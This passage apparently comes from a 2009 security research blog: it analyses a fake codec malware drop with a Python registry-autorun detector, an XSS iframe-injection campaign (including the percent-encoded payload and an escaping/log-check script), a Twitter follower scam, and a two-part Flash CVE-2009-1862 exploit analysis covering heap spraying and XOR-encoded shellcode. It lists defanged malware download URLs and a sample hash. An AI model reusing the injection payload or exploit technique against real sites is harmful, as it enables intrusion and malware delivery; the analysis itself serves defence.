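"Updater"="\"C:\\Program Files\\Vendor\\updater.exe\" /background"
"Shell Hardware"="rundll32.exe C:\\WINDOWS\\system32\\shell32.dll,Control_RunDLL"
'''

REG_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)+)"="((?:[^"\\]|\\.)*)"$')
# rundll32[.exe] <dll path>[,] <entry point>, with or without quotes around the path.
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+?\.dll)"?\s*,\s*([A-Za-z_]\w*)',
                       re.IGNORECASE)
# Directory markers that a normal user can write to; a DLL loaded from here at logon is suspect.
PROFILE_DIRS = ("%appdata%", "\\application data\\", "\\appdata\\",
                "%temp%", "\\temp\\", "%userprofile%")


def unescape_reg(value):
    """Undo Regedit escaping: \\\\ -> \\ and \\" -> "."""
    return re.sub(r"\\(.)", r"\1", value)


def parse_run_values(reg_text):
    """Return {value_name: data} for the values under a ...\\CurrentVersion\\Run key."""
    values, in_run_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_run_key = line.rstrip("]").lower().endswith("\\currentversion\\run")
            continue
        match = REG_VALUE_RE.match(line)
        if in_run_key and match:
            values[unescape_reg(match.group(1))] = unescape_reg(match.group(2))
    return values


def flag_autoruns(values):
    """Flag rundll32 autoruns whose DLL path sits in a user-writable profile directory."""
    findings = []
    for name, data in values.items():
        match = RUNDLL_RE.search(data)
        if not match:
            continue
        dll, entry = match.group(1), match.group(2)
        if any(marker in dll.lower() for marker in PROFILE_DIRS):
            findings.append({"name": name, "dll": dll, "entry": entry})
    return findings


if __name__ == "__main__":
    for finding in flag_autoruns(parse_run_values(REG_EXPORT)):
        print(f"{finding['name']}: rundll32 loads {finding['dll']} and calls {finding['entry']}")
```

The system32 rundll32 entry passes because the check is on where the DLL lives, not on rundll32 itself; legitimate software rarely needs a logon-time DLL under %AppData%, which is why that combination is worth an alert even when the DLL's hash is unknown to AV, as it was here.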

No network traffic was observed after infection. There is an identifiable string in the binary, (beyond the function calls from imported Windows DLLs): dvyllawnx.dll. Googling for atmsyssound.dll, cryptwm97.dll, and dvyllawnx.dll revealed no results. While the exact functionality of the binary is currently unknown, odds are that it is an information stealer of some kind or backdoor similar to Zlob (which has been the typical payload of these Fake Codec attacks). I plan to conduct further analysis on the payload and will share in a future blog post if it is interesting.

Some lessons from this:
  • Social network sites allow users (including malicious users) to post / advertise content (including malicious content).
  • While browser alerts and anti-virus products are good tools, they are not very effective by themselves.
  • The Fake Codec / AV campaign is still alive and well after all these years, and these and other malware campaigns will continue to adapt to social networking advertisements and difficult to detect / analyze payloads.

XSS Embedded iFrames

Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe pointing to a malicious webpage redirector. An unknowing user following such an advertisement would believe they were just visiting the intended host site, unaware that the iframe was also redirecting them to malicious content.

Here are a few examples with some of the malicious XSS advertisements (do not follow these or other "hxxp" URLs below):


In each of the above examples, the parameter passed to the server's .htm or .php file is a string that includes encoded HTML. When the server processes the parameter, it displays the original parameter (users usually want to see their query string) along with its results. Because the original parameter is displayed on the page without any sanitization of this type of encoded HTML, the XSS is possible. The encoded HTML in each case is percent-encoded (hexadecimal) HTML:

%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

which decodes to a closing </title> tag for the query string, followed by the malicious iframe to embed:

<iframe src="//ask5.eu">
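To make the reflection concrete, here is an added example (not code from the post or from any of the affected sites). It decodes the post's payload exactly as a browser would (the decoded string is </title><iframe src=//ask5.eu>, with an unquoted src), shows the vulnerable rendering beside the fixed one where the reflected value is HTML-escaped, and runs the same tag check over a few constructed web-server log lines in common log format to find requests carrying markup in the query string. SAMPLE_LOG and the client addresses in it are constructed; render_vulnerable and render_hardened are hypothetical stand-ins for the search page.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# The percent-encoded payload from the post.
ENCODED_QUERY = ("%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63"
                 "%3D%2F%2F%61%73%6B%35%2E%65%75%3E")

# Constructed access-log lines (common log format); the request path is field 7.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Dec/2009:10:02:11 -0500] "GET /search.htm?q=holiday+gifts HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Dec/2009:10:02:40 -0500] "GET /search.htm?q=' + ENCODED_QUERY + ' HTTP/1.1" 200 5211',
    '203.0.113.9 - - [14/Dec/2009:10:03:01 -0500] "GET /search.php?s=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4998',
]

TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")


def render_vulnerable(query):
    """Reflect the decoded query into the page unescaped, as the affected search.htm did:
    markup in the parameter becomes markup in the page (breaking out of <title>)."""
    return f"<html><head><title>Results for {unquote(query)}</title></head><body></body></html>"


def render_hardened(query):
    """Same page with the reflected value HTML-escaped: the browser shows the payload as text."""
    safe = html.escape(unquote(query), quote=True)
    return f"<html><head><title>Results for {safe}</title></head><body></body></html>"


def injected_tags(query):
    """Tag names present in the decoded parameter; a non-empty list is a reflected-HTML attempt."""
    return [t.lower() for t in TAG_RE.findall(unquote(query))]


def flag_request_log(lines):
    """Return (line_number, tags) for log lines whose request query string carries markup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 7:
            continue
        tags = injected_tags(urlsplit(fields[6]).query)
        if tags:
            hits.append((number, tags))
    return hits


if __name__ == "__main__":
    print("decoded:", unquote(ENCODED_QUERY))
    print("vulnerable:", render_vulnerable(ENCODED_QUERY))
    print("hardened:  ", render_hardened(ENCODED_QUERY))
    print("log hits:", flag_request_log(SAMPLE_LOG))
```

The escaped page still shows the user their query string, which is what the site wanted; it just no longer lets the query close the title element and open an iframe. The log check decodes before matching, since the whole point of the hex encoding was to keep the tags out of a naive grep.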

ask5.eu does a JavaScript redirect using parent.location.replace() to:
hxxp://alanhui.co.cc

which does a JavaScript parent.location.replace() to:
hxxp://max-well2.cn/?pid=349s01&sid=dd93d9

which lands the user at:
hxxp://windows-antivirus4.com/scan1/?pid=349s1&engine=%3DHW39TjuMDQxLjYyLjEyMyZ0aW1lPTEyNjI4NUEOOAkO

and downloads:
hxxp://windows-antivirus4.com/download/Inst_349s1.exe

Fake AV malware sample:
MD5: c0d2017be29e5383b1a680ef59ed22e0
Virus Total (6/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260851264

Monday, November 23, 2009

Twitter Follower Scams

Introduction
It's cool to be on Twitter but it's cooler still to have more followers than your neighbor. Some are so desperate to move into the lead that they're pulling out their credit card to get there. Those gullible enough to participate in the growing number of Twitter Follower scams are sure to be disappointed.

Scammers are setting up websites promising to provide Twitter followers to anyone willing to sign up. There are typically two levels of membership - basic and VIP. A basic membership offers followers in exchange for the right to "use your account to promote [their] services". Effectively, you are handing over your Twitter username and password to a third party that will then leverage your account to promote their service. In return, you are promised Twitter followers. In our tests, we received no followers but were signed up to follow a couple of hundred accounts that were presumably either fake accounts setup by the service or other victims. How do they make money? In part through advertising on their webpage but primarily by convincing individuals to become VIP members. To become a VIP member, you must either recruit others to sign up for the service or pay for the privilege. VIP membership comes with the promise of "100-400 [new followers] each day". If you choose to take the recruitment route, when initially signing up, you are provided with a unique URL that is to be given to others for signup. This will supposedly allow the service to keep track of your recruits and promote you to VIP status free of charge after 15 additional accounts are recruited. We attempted to promote our test accounts to VIP status this way; however, the domain name in the URL provided did not resolve and the request would therefore fail. Effectively, this leaves paying a monetary fee as the only option to achieve VIP status.

The Scam
Promotion
Tweets sent from the accounts of past victims promote one of the many websites driving the scams. The URL is always obfuscated using a URL shortener, and numerous URL shortening services are leveraged.

Common Tweets
If you want 400 followers a day use…
If you wantt 100 followers a day use…
I got 100 followers using…
I just got 400 followers using…
to get 400 followers a day…
If you want to get alot of followers check out…
Hey I just got alot of followers using…
I got 100 followers in a day using…
Get 500 followers a day using…
THE BEST WAY TO GET MORE FOLLOWERS…
OUR GOAL IS TO GET U MORE FOLLOWERS…
This site got me 200 followers quick…
Want FREE VIP, 100 new followers instantly and 1,000 new followers next week?
The best way to get 100 followers faster is using
Hey I just got alot of followers using

Common sites
http://followersquick.info/
http://tweeterspeed.com/
http://twittfollow.com/
http://followquick.info/
http://tweeterleaders.info/
http://twittfollow.info/
http://wannafollowme.com/
http://twtfast.info/
http://twitter-builder.com/

Whois information and IP address lookups suggest that at least some of the aforementioned websites are run by the same individuals. A number of the sites resolve to a single web hosting company in Malaysia and use the WhoisGuard service to hide registration information for the domains in question.

Propagation
When a user visits the site and enters their Twitter name and password, they have effectively handed over control of their Twitter account to a third party. The scammers will then use that account to further promote the service. The user may receive a handful of followers, but in our experience they are simply fake accounts set up by the scammers themselves, if any followers are received at all. One of our favorite touches: the 'I agree with the rules' checkbox on the signup page can't be unchecked.

Revenue
VIP membership comes with the promise of "100-400 [new followers] each day". It can supposedly be obtained by either recruiting others to sign up for the service or by paying anywhere from $20 to $1,500, depending upon the duration of your VIP status (4 days to one year). Most scams leverage PayPal to complete the transaction. While it’s unclear how many people are actually pulling out their credit card to participate, the volume of Twitter accounts seen that have apparently signed up for the service, along with the number of scams emerging, suggest that the scam is successful.

Sadly, the scammers are actually rather straightforward about what they're doing, if only victims were to take the time to review the 'rules':
  • You have to add all vip users and 20 regular users to join the train.
  • We may use your account to promote our services, with the exception of VIP account.
  • The fee for VIP is non-refundable.
  • After payment, give us up to 6 hours to update your VIP status.

How Successful is the Scam?
Searching for either the phrases used to promote the sites, or the shortened URLs themselves shows that thousands of people are signing up for the services every day in the hopes that it will increase their number of Twitter followers. The screenshot below indicates that for only one of the sites, hundreds of Tweets Per Hour (TPH) are appearing in the Twitter live feed. What's not clear is how many people are taking the additional step of sending money to become VIP members.

Twitter's Response
What is Twitter doing about the scams? Nothing. Thousands of tweets promote the scam sites every day and they aren't hard to find. Twitter could easily be implementing filters to identify common phrases or URLs. Beyond this, common phishing blacklists such as PhishTank.org and Google’s SafeBrowsing, are largely ignoring such sites as well.

Conclusion
These sites are scams, plain and simple. In our experience, signing up for the service will ensure that your account is used to send out Twitter spam to promote the service and follow hundreds of other accounts but result in no meaningful additional followers. We chose not to pay for the VIP service but even if followers are added, they will simply be other victims or fake accounts created by those running the scam. If simply building up the number of followers on your Twitter account is of that much importance, regardless of who they are, take the time to create a bunch of fake Twitter accounts on your own – it’s free. If you have signed up for such a service in the past, we recommend changing your Twitter password immediately to ensure that the service can no longer post messages on your behalf. Your account could be used to post content that you don’t approve of and if so, good luck explaining why you shared your Twitter credentials.

Friday, September 18, 2009

In the wild Flash exploit analysis – part 2

In the first blog, we talked about how a recent Flash exploit works using heap spraying. In this blog, we will see how the shellcode functions and how it downloads malicious binaries to an infected system. If you remember, the malicious shellcode was loaded onto the heap by the exploit. So let’s try to see if we can identify strings or URLs in the loaded shellcode. If you look closely, the shellcode is not in a readable format and appears to be encoded. Here is how the shellcode looks:

There is no single identifiable string in the shellcode. Let’s debug this shellcode further to understand if it is encoded or not. When we left off in the last blog, we were at a “CALL EAX” instruction with EAX pointing to 08080808. If we press F9, we will land on the heap and start executing every NOP instruction until ultimately reaching the malicious shellcode. We will reach the first instruction of the shellcode by putting a hardware breakpoint in the shellcode. Here is another screenshot of the debugger:

The shellcode contains some unused instructions, so it is difficult to understand using static analysis alone. Let’s debug it step by step. The first few instructions are the same as before and POP EAX from the stack. Then there is a short jump to 08089C42, which calls the address 08089C32. At that point it XORs ECX and loads the value 3B8 (decimal 952) into CX. Then there is a small loop, which is very interesting.

08089C3A 80340B BD XOR BYTE PTR DS:[EBX+ECX],0BD

08089C3E ^E2 FA LOOPD SHORT 08089C3A

The first instruction XORs each byte with 0BD, working backwards from the last byte: the first pass touches [EBX+ECX] with ECX at 952, and LOOPD decrements ECX and repeats until it reaches zero, so every byte from EBX+952 down to EBX+1 is decoded. This is the method used to encode the original shellcode. After exiting the loop, we land in the decoded shellcode, which can now be reviewed. Here is the XOR’ed version of the original shellcode:

Gr8! Every instruction is now readable and easy to understand. We can now attempt to identify strings. I went into a memory dump of the heap and converted instructions into Hex/ASCII format. Here, I was able to find some known strings and one URL at the end. Here is the ASCII dump:

Now, this looks pretty straightforward. The above decoded shellcode is going to download “css.exe” to the infected system. At this point, I downloaded the malicious file. Let’s open it in OllyDbg, try to find some additional strings and see what the executable is doing. A quick look at the disassembly was enough to realize what the file does. I found an additional URL request in the code:

This executable downloads additional malware by visiting “hxxp://www.ffxiname.com”. Then it adds some registry values and runs the library “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\300056251037don.dll,Set1” using "C:\WINNT\System32\rundll32.exe”. The TEMP directory will be full of additional malicious executables and DLLs. The website in question (“ffxiname.com”) appears to be a drop zone, containing numerous additional exploits. The site will deliver different exploits based on the browser issuing the request. Here are some Wireshark packet captures from the website:

The site is exploiting browser specific vulnerabilities to push additional malware. This is not the end of this process. It also downloads,

hxxp://www.40sys40.cn/txt/a1.exe

hxxp://www.40sys40.cn/txt/a2.exe

hxxp://www.40sys40.cn/txt/a3.exe

hxxp://www.40sys40.cn/txt/a4.exe

Additionally, two DLLs are downloaded into the temp folder. The names of the files are “231053kou.dll” and “231054eve.dll”. Based on strings identified in the DLLs, it appears that they are used to sniff passwords for various web domains, as can be seen in the following screen capture:

As can be seen, the initial infection due to the Flash vulnerability is only the start of the process. Successful exploitation leads to additional malicious binaries being downloaded to the infected system. The exploit also led to the installation of malicious DLLs, which steal valuable information such as login credentials when you visit popular web sites.

That’s it for this series. Remember, this chain of infection was triggered when a victim with a vulnerable Flash Player simply viewed a single malicious page; no user intervention was required. This also shows how active Flash exploits are in the wild. Keep your systems/AV up to date and install the latest Flash Player from Adobe.

Be Safe,

Umesh

Thursday, September 10, 2009

In the wild Flash exploit analysis – part 1

Today, one of my colleagues requested that I provide additional details about a web page that we had blocked for a customer. The blocked URL was ‘hxxp://www.39sys39.cn/htm/ie.html’. He wanted details about the threat present on the page. I downloaded the page and found that it contained obfuscated JavaScript with heap spray code. I also found that the exploit contained a tag with a source file called “xp.swf”. At first glance, it was clear that the page was trying to exploit a Flash vulnerability. The exploit code is shown below:

The above exploit employed simple obfuscation to evade signature engines. If we decode the above script, we find the following:

It is also spraying the heap at the address “0x08080808”. Shortly, we will learn why this address is needed to exploit the vulnerability. I downloaded both the “ie.html” and “xp.swf” files for further analysis. I also uploaded the “xp.swf” file to VirusTotal to see if it was a known exploit or perhaps zero-day content. Only 9 out of 41 antivirus engines detected the file as a virus. Those that did identified the file as an exploit attacking CVE-2009-1862. This is a recent vulnerability, for which exploit code is currently in the wild, affecting Adobe Reader and Adobe Flash Player. To check if the exploit was working properly, I replaced the shellcode in the exploit with simple shellcode that executes “calc.exe”. I opened this file with both Firefox and Internet Explorer, and here is what happened,

The JavaScript code successfully exploited the known vulnerability in Flash and executed our replacement shellcode to open “calc.exe”. This demonstrates just how dangerous the vulnerability is as it requires a victim to simply visit a malicious page containing the Flash exploit. No further user intervention is required. In this case, I had replaced the original shellcode for testing and the exploit opened calculator successfully. Next, I wanted to determine the purpose of the original shellcode, so I then modified the original exploit code to force a crash in order to debug further. I ran the file again, this time with Internet Explorer and received the following popup message:

The referenced memory address in the above figure is “0x08214408”. The program is unable to read data from this invalid address, which led to the crash. Now, if you remember, the original exploit in the first image of the blog uses the “0x08080808” memory address to spray the heap with shellcode. Bingo! This means the program may be crashing due to memory corruption, and that is why the exploit must spray the heap with the address “0x08080808”. I then clicked on the Cancel button to debug further. I wanted to find which instruction actually reads the data and calls the shellcode. Here is the first state of the OllyDbg debugger:

Look at the above instructions. The register EDX is trying to read a value from ESI which points to invalid address 08214408. Let’s analyze the instructions that follow.

MOV EDX,DWORD PTR DS:[ESI]

MOV EAX,DWORD PTR DS:[EDX+44]

PUSH EBP

MOV ECX,ESI

CALL EAX

TEST AL,AL

Let’s assume [ESI] contains some value which is moved to EDX. Then EAX will contain the value [EDX+44]. Then the program will push EBP on the stack, move the ESI address to ECX and look at the next instruction “CALL EAX”. This is where a call has been made to execute the shellcode. We can conclude that if we spray the heap with 08080808 and shellcode, [ESI] will contain 08080808, which will be moved to EDX. EAX will also contain 08080808 which will be called after the “MOV ECX, ESI” command. Then this call will jump to heap memory at an address of 0x08080808 and execute the shellcode. Let’s see if that holds true.

This time I reopened the original exploit in Firefox, put a breakpoint at the above-mentioned instructions and, sure enough, we were right. EAX now points to 08080808 and the heap is sprayed with 08 bytes and shellcode. If I press “F9” to continue, execution will jump onto the heap area and execute the instructions found there. The byte sequence 0808 is effectively a NOP sled. It decodes to “OR BYTE PTR DS:[EAX],CL”, which does nothing as CL contains 08. Execution slides through the 0808 instructions until it reaches the shellcode and ultimately executes the malicious code.
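As an added model (not code from the original post) of the dereference chain above, the following shows why the read at 0x08214408 faults when the heap has not been sprayed, and why spraying 0x08 bytes makes [ESI], [EDX+44] and the call target all equal 0x08080808 so that the call lands in the OR [EAX],CL sled. The memory model, spray base and spray size are constructed; the addresses and the 0x44 offset are the ones quoted in the post.

```python
import struct
from typing import Dict, Tuple

SPRAY_VALUE = 0x08080808   # value the exploit's JavaScript sprays across the heap
SLOT_OFFSET = 0x44         # from MOV EAX,DWORD PTR DS:[EDX+44]
CRASH_ESI = 0x08214408     # invalid address ESI held when the crash popup appeared

class AccessViolation(Exception):
    """Raised for a read outside mapped memory, mirroring the crash popup."""

class Memory:
    """Sparse 32-bit memory model (constructed): only mapped ranges are readable."""
    def __init__(self) -> None:
        self.regions: Dict[int, bytes] = {}

    def map(self, base: int, data: bytes) -> None:
        self.regions[base] = data

    def read32(self, addr: int) -> int:
        for base, data in self.regions.items():
            if base <= addr and addr + 4 <= base + len(data):
                return struct.unpack_from("<I", data, addr - base)[0]
        raise AccessViolation("read from unmapped address 0x%08x" % addr)

def resolve_call_target(mem: Memory, esi: int) -> int:
    """Follow the crash-site sequence MOV EDX,[ESI]; MOV EAX,[EDX+44]; CALL EAX
    and return the address the CALL would transfer to."""
    edx = mem.read32(esi)
    return mem.read32(edx + SLOT_OFFSET)

def is_or_eax_cl_sled(mem: Memory, addr: int) -> bool:
    """Opcode bytes 08 08 decode to OR BYTE PTR [EAX],CL; a run of them acts as a
    NOP sled while EAX points into 0x08-filled memory and CL == 0x08."""
    return mem.read32(addr) == SPRAY_VALUE

def without_spray() -> str:
    """Nothing mapped near ESI: the very first dereference faults."""
    mem = Memory()
    try:
        resolve_call_target(mem, CRASH_ESI)
    except AccessViolation as fault:
        return str(fault)
    return "no fault"

def with_spray(spray_base: int = 0x08000000, spray_size: int = 0x400000) -> Tuple[int, bool]:
    """Constructed 4 MB spray of 0x08 bytes covering both the faulting read at ESI
    and the slot at 0x08080808+0x44, so every dereference yields SPRAY_VALUE."""
    mem = Memory()
    mem.map(spray_base, b"\x08" * spray_size)
    target = resolve_call_target(mem, CRASH_ESI)
    return target, is_or_eax_cl_sled(mem, target)
```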

This means some field/value from the malicious Flash file is causing memory corruption. Here is how the original shellcode is loaded into memory,

This is just an overview of how this exploit works. In the next part we will see what the original shellcode does. Specifically, we will identify the additional content downloaded to the victim’s machine.

This exploit proves that Flash exploits can be very dangerous. Such exploits do not require user intervention. Simply by visiting a malicious web page, the victim will be exploited.

That’s it for part 1. Do come back for part 2 of this blog.

Umesh